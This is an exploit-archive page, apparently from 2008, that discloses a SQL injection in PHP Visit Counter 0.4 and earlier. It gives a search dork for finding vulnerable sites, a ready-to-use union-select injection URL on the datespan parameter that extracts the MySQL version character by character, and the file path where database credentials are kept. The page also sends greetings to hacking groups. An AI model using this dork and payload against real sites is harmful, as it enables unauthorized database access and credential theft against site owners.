PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : PHP Visit Counter <= 0.4 (datespan) SQL Injection Vulnerability
# Published : 2008-05-31
# Author : Lidloses_Auge
# Previous Title : AzureSites CMS Multiple Remote Vulnerabilities
# Next Title : iJoomla News Portal (Itemid) Remote SQL Injection Exploit

###############################################################
#
#           PHP Visit Counter <= 0.4 - SQL Injection Vulnerability
#                                                             
#      Vulnerability discovered by: Lidloses_Auge             
#      Greetz to:                   -=Player=- , Suicide, g4ms3, enco,
#                                   GPM, Free-Hack, Ciphercrew, h4ck-y0u
#      Date:                        30.05.2008
#
###############################################################
#                                                             
#      Dork:  inurl:"read.php?datespan="
#
#      Vulnerability:
#
#      1.) SQL Injection
#
#         1.1.) [Target]/read.php?action=read&cat=portal&datespan=null+group+by+null+union+select+1,2,ascii(substring(version(),1,1))/*
#
#      Notes:
#
#         Output is displayed as INT, so you've to convert it into ascii and
#         scan every single letter to get the whole name.
#         MySQL Data is stored in [Counterpath]/variables.php
#
###############################################################

# www.Syue.com [2008-05-31]